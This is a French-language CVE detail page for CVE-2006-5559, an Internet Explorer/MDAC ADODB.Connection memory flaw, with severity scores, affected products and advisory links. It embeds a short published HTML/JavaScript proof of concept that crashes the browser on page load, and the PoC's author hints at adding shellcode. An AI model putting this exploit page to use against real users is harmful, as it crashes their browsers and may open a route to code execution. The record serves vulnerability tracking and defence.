CVE-2006-5559 : Détail

CVE-2006-5559

A03-Injection
96.48%V3
Network
2006-10-27
14h00 +00:00
2018-10-12
17h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Execute method in the ADODB.Connection 2.7 and 2.8 ActiveX control objects (ADODB.Connection.2.7 and ADODB.Connection.2.8) in the Microsoft Data Access Components (MDAC) 2.5 SP3, 2.7 SP1, 2.8, and 2.8 SP1 does not properly track freed memory when the second argument is a BSTR, which allows remote attackers to cause a denial of service (Internet Explorer crash) and possibly execute arbitrary code via certain strings in the second and third arguments.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 2629

Date de publication : 2006-10-23 22h00 +00:00
Auteur : YAG KOHHA
EDB Vérifié : Yes

<!-- // Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC // tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed // Author: YAG KOHHA (skyhole [at] gmail.com) // Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic // Access violation at: // ---------------------------------------------------- // 77114D0F 66:8B75 00 MOV SI,WORD PTR SS:[EBP] // ---------------------------------------------------- // P.S. It`s will be fast with some shellcode :P --!> <html> <head> <title>ADODB.Connection.Execute CRASH TEST</title> </head> <script> function Bang_Bang() { var a = new ActiveXObject('ADODB.Connection.2.7'); var b = 'FUCK'; while (b.length <= 1024*256) b+=b; for (var i = 0; i < 32768; i++) try { a.Execute(b,b,b); } catch(e) {} } </script> <body onLoad='Bang_Bang()'> <center><h1>WOW!!! Are U live?</h1></center> </body></html> # milw0rm.com [2006-10-24]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Data_access_components >> Version 2.5

Configuraton 0

Microsoft>>Windows_xp >> Version *

Microsoft>>Data_access_components >> Version 2.8

Configuraton 0

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version itanium

    Microsoft>>Data_access_components >> Version 2.8

    Configuraton 0

    Microsoft>>Windows_2000 >> Version *

    Microsoft>>Data_access_components >> Version 2.7

    Configuraton 0

    Microsoft>>Windows_2000 >> Version *

    Microsoft>>Data_access_components >> Version 2.8

    Configuraton 0

    Microsoft>>Windows_2000 >> Version *

    Microsoft>>Data_access_components >> Version 2.8

    Références

    http://securitytracker.com/id?1017127
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.securityfocus.com/bid/20704
    Tags : vdb-entry, x_refsource_BID
    http://secunia.com/advisories/22452
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.us-cert.gov/cas/techalerts/TA07-044A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://www.kb.cert.org/vuls/id/589272
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.osvdb.org/31882
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.vupen.com/english/advisories/2007/0578
    Tags : vdb-entry, x_refsource_VUPEN